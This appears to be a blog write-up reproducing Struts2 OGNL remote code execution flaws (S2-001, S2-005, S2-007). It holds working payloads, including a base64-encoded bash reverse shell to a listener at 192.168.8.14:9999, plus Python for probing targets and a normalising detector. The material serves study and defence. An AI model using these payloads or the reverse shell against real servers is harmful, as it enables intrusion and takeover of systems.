Struts2 framework vulnerability reproduction

1. S2-001 Remote Code Execution Vulnerability (CVE-2007-4556)

Vulnerability Profile

When a user submits form data and validation fails, the back end re-renders the form and, while refilling each field, evaluates the previously submitted value as an OGNL expression (%{value}) before writing it back into the field. A submitted value that is itself an OGNL expression is therefore executed on the server.

Affected versions

Struts 2.0.0 - 2.0.8

Vulnerability reproduction

Enter %{1+1} into a form field; if the value echoed back is 2, the vulnerability exists.

Get the Tomcat path (the JVM's user.dir, normally Tomcat's bin directory)

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

Get the real path of the web application on disk

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
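The %{1+1} check above can be automated. The following is an added example and not code from the original post: it builds a randomised a+b probe (so that a page which already happens to contain the digit 2 cannot produce a false positive), and decides from the re-rendered form whether the echoed value is the literal expression (safe) or its result (vulnerable). The field name username, the other form fields and the target URL are assumptions, and the two sample responses are constructed rather than captured.

```python
import random
import urllib.parse
import urllib.request
from html.parser import HTMLParser


def build_probe():
    """Return (probe, expected): a random a+b OGNL probe and its result as text."""
    a, b = random.randint(1000, 9999), random.randint(1000, 9999)
    return f"%{{{a}+{b}}}", str(a + b)


class _InputValues(HTMLParser):
    """Collect the value attribute of every <input name=...> in a response."""

    def __init__(self):
        super().__init__()
        self.values = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "input":
            attrs = dict(attrs)
            if "name" in attrs:
                self.values[attrs["name"]] = attrs.get("value") or ""


def echoed_value(html, field):
    """Value the re-rendered form put back into `field`, or None if absent."""
    parser = _InputValues()
    parser.feed(html)
    return parser.values.get(field)


def classify(echoed, probe, expected):
    """'vulnerable' when the probe came back evaluated, 'safe' when it came
    back as the literal expression, 'unknown' when the field was not re-rendered."""
    if echoed is None:
        return "unknown"
    if echoed.strip() == expected:
        return "vulnerable"
    if probe in echoed:
        return "safe"
    return "unknown"


def probe_target(url, field="username", other_fields=None, timeout=10):
    """Send the probe to a live target (network; not exercised offline).
    Sending the other required fields empty makes validation fail, so the form
    is re-rendered, which is the step that re-evaluates the submitted value."""
    probe, expected = build_probe()
    data = {field: probe, **(other_fields or {})}
    req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        html = resp.read().decode("utf-8", errors="replace")
    return classify(echoed_value(html, field), probe, expected)


# Constructed sample responses (not captured from a real server).
PROBE, EXPECTED = "%{1234+3569}", "4803"
VULNERABLE_HTML = ('<form action="login.action" method="post">'
                   '<input type="text" name="username" value="4803"/>'
                   '<input type="password" name="password" value=""/></form>')
SAFE_HTML = ('<form action="login.action" method="post">'
             '<input type="text" name="username" value="%{1234+3569}"/></form>')

if __name__ == "__main__":
    print(classify(echoed_value(VULNERABLE_HTML, "username"), PROBE, EXPECTED))  # vulnerable
    print(classify(echoed_value(SAFE_HTML, "username"), PROBE, EXPECTED))        # safe
```

probe_target(url, other_fields={"password": ""}) is the live form of the check; classify() deliberately answers "unknown" rather than "safe" when the field is not re-rendered at all, since in that case validation did not fail and the re-evaluation path was never reached.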

2. S2-005 Remote Code Execution Vulnerability (CVE-2010-1870)

Vulnerability Profile

S2-005 descends from S2-003 (affected versions: earlier than Struts 2.0.12). Struts2 parses every HTTP parameter name as an OGNL expression and evaluates it (think of it as executing Java code). OGNL reaches the Struts context objects through the # prefix, so the framework tried to prevent abuse by filtering the # character; that filter is bypassed by writing the character as a unicode escape (\u0023) or an octal escape (\43). The official fix for S2-003 added a security configuration (forbidding static method calls and method execution, among other things), but that configuration is itself reachable from OGNL: an attacker can switch both options back with an OGNL expression, which is S2-005.

Affected versions

Struts 2.0.0 - 2.1.8.1

Bypass process

In S2-003, \u0023 is used to bypass the Struts2 filter on #.

After S2-003, Struts2 added a security mode (sandbox).

In S2-005, an OGNL expression turns the security mode off, bypassing it again.

Vulnerability reproduction

Open the vulnerable page in a browser.
Capture the request with Burp Suite.
Change the request method to POST and replace the body with the following command-execution payload (it creates /tmp/success on the server):

(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1
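The payload above stacks three layers, and it is easier to see them when the body is rebuilt from plain OGNL. The following is an added example, not code from the original post: ognl_escape() is the S2-003 filter bypass (# and = written as \u0023 and \u003d), make_param() is OGNL's (expr)(root) double-evaluation form that makes Struts parse the string literal as a second expression, and build_body() is the URL-encoding for the POST. server_view() undoes the outer layers to show what the OGNL parser receives. The placeholder parameter names vaaa/aaaa/asdf are the ones the payload uses; which characters are left unencoded is a choice made here, so build_body() reproduces the published body only up to encoding and quoting.

```python
import re
import urllib.parse

# Statements the attacker wants Struts to evaluate, in plain OGNL:
# (parameter name, expression, optional setup evaluated first, POST value)
STATEMENTS = [
    ("vaaa", "#_memberAccess['allowStaticMethodAccess']", None, "true"),
    ("aaaa", "#context['xwork.MethodAccessor.denyMethodExecution']=#vccc",
     '#vccc=new java.lang.Boolean("false")', None),
    ("asdf", '#rt.exec("touch@/tmp/success".split("@"))',
     "#rt=@java.lang.Runtime@getRuntime()", "1"),
]


def ognl_escape(expr):
    # Layer 1: '#' and '=' become the OGNL escapes \u0023 and \u003d, so the
    # parameter-name filter added for S2-003 never sees a literal '#'.
    return expr.replace("#", "\\u0023").replace("=", "\\u003d")


def make_param(name, expr, setup=None):
    # Layer 2: OGNL's (a)(b) evaluates a and, if the result is a string, parses
    # it as a second expression evaluated against b. Without a setup the
    # parameter is (expr)(name) and the POST value is assigned to expr; with a
    # setup it is (name)((expr)(setup)), so the setup runs before expr.
    quoted = "('%s')" % ognl_escape(expr).replace("'", "\\'")
    if setup is None:
        return "%s(%s)" % (quoted, name)
    return "(%s)(%s(%s))" % (name, quoted, ognl_escape(setup))


def build_body(statements):
    # Layer 3: URL-encode each parameter name for the POST body.
    parts = []
    for name, expr, setup, value in statements:
        enc = urllib.parse.quote(make_param(name, expr, setup), safe="()[]@.,/*_")
        parts.append(enc if value is None else "%s=%s" % (enc, value))
    return "&".join(parts)


def server_view(encoded):
    # Undo layers 3 and 1: the servlet container URL-decodes the parameter name
    # and OGNL resolves the \uXXXX escapes, so this is the text OGNL executes.
    s = urllib.parse.unquote(encoded)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)


# First parameter name exactly as it appears in the payload above.
PAGE_PARAM1 = "(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)"

if __name__ == "__main__":
    body = build_body(STATEMENTS)
    print(body)
    print(server_view(body))
    print(server_view(PAGE_PARAM1))
```

The point of server_view() is that any control inspecting parameter names before decoding (the original # filter, or a naive WAF rule) sees no # at all, while OGNL sees #_memberAccess['allowStaticMethodAccess'] and assigns true to it.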


3. S2-007 Remote Code Execution Vulnerability (CVE-2012-0838)

Vulnerability Profile

The age field comes from user input. Submitting a non-integer value for it fails type conversion, and Struts2 then evaluates the user's input as an OGNL expression, which is the vulnerability. Concretely, when a field has a validation rule configured in the action's -validation.xml and the type conversion fails, the server wraps the submitted string in single quotes ("'" + value + "'"), parses the result as an OGNL expression and echoes it back into the form.
Because the value is spliced into an OGNL string literal, any form field with such a validation rule that can be made to throw a conversion error is injectable: a single quote breaks out of the literal, exactly as in SQL injection, and the rest of the input is evaluated as arbitrary OGNL.

Affected versions

Struts 2.0.0 - 2.2.3

Vulnerability reproduction

Enter a non-numeric value in the age field and click Login. The value echoed back in the age field is no longer what was typed, which proves the vulnerability exists.
List the root directory

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '

or

%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%20/%27%29.getInputStream%28%29%29%29+%2B+%27

Reverse shell (the base64 string decodes to bash -i >& /dev/tcp/192.168.8.14/9999 0>&1; replace the address and port with those of your own listener)

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream())) + '

or

%27%20%2b%20%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%66%6f%6f%3d%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%42%6f%6f%6c%65%61%6e%28%22%66%61%6c%73%65%22%29%20%2c%23%63%6f%6e%74%65%78%74%5b%22%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%22%5d%3d%23%66%6f%6f%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%67%75%4d%54%51%76%4f%54%6b%35%4f%53%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%20%2b%20%27
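Both the S2-005 body and the S2-007 form values on this page, whatever their outer encoding, flip #_memberAccess['allowStaticMethodAccess'] and #context['xwork.MethodAccessor.denyMethodExecution'] before reaching Runtime.exec. The following is an added example of detection logic, not code from the original post: it normalises a request body (nested URL %XX decoding, OGNL \uXXXX escapes, OGNL octal escapes such as \43 for #) and only then matches the indicator tokens, so the escaped S2-005 body, the URL-encoded S2-007 payload and an octal variant are all caught while a legitimate # in a password is not. The request bodies other than the two payloads quoted on this page are constructed, and the two-indicator threshold is a choice made here.

```python
import re
import urllib.parse

# Indicator regexes applied only after normalisation; the tokens are the ones
# the payloads on this page use to disable the OGNL sandbox and reach Runtime.
INDICATORS = {
    "_memberAccess": r"#_memberAccess",
    "allowStaticMethodAccess": r"allowStaticMethodAccess",
    "denyMethodExecution": r"xwork\.MethodAccessor\.denyMethodExecution",
    "Runtime.exec": r"@java\.lang\.Runtime@getRuntime\(\)\.exec\(|#\w+\.exec\(",
}

_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
_OCTAL = re.compile(r"\\([0-7]{1,3})")


def normalize(s, max_rounds=3):
    r"""Decode until stable: URL %XX (possibly nested), then OGNL \uXXXX
    escapes, then OGNL octal escapes (\43 is '#'), so a '#' written as
    %5cu0023, \u0023 or \43 surfaces as a literal '#' for the indicator match."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        decoded = _UNICODE.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        decoded = _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), decoded)
        if decoded == s:
            break
        s = decoded
    return s


def detect(raw):
    """Names of the indicators present in the normalised text, in INDICATORS order."""
    norm = normalize(raw)
    return [name for name, pat in INDICATORS.items() if re.search(pat, norm)]


def flag_requests(bodies, threshold=2):
    """(index, hits) for every body with at least `threshold` indicators.
    Requiring two tokens keeps an isolated '#' or '.exec(' from alerting."""
    flagged = []
    for i, body in enumerate(bodies):
        hits = detect(body)
        if len(hits) >= threshold:
            flagged.append((i, hits))
    return flagged


# S2-005 body exactly as quoted on this page (unicode-escaped, URL-encoded).
S2_005_BODY = "(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1"
# S2-007 'ls /' payload from this page, placed in the age field of a constructed login body.
S2_007_BODY = "username=admin&password=admin&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%20/%27%29.getInputStream%28%29%29%29+%2B+%27"
# Constructed: the first S2-005 parameter with '#' written as the octal escape \43.
OCTAL_PROBE = "(%27%5c43_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(x)=true"
# Constructed benign body: %23 decodes to a legitimate '#' inside a password.
BENIGN = "username=admin&password=%23Secure%23Pass1&age=23"

SAMPLE_BODIES = [S2_005_BODY, S2_007_BODY, OCTAL_PROBE, BENIGN]

if __name__ == "__main__":
    for i, hits in flag_requests(SAMPLE_BODIES):
        print(i, hits)
```

Matching before normalisation would miss S2_005_BODY entirely (it contains no # at all on the wire), which is the same gap the original Struts filter had; matching on a decoded # alone would flag BENIGN, hence the token set and threshold.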



Origin blog.csdn.net/guo15890025019/article/details/122359686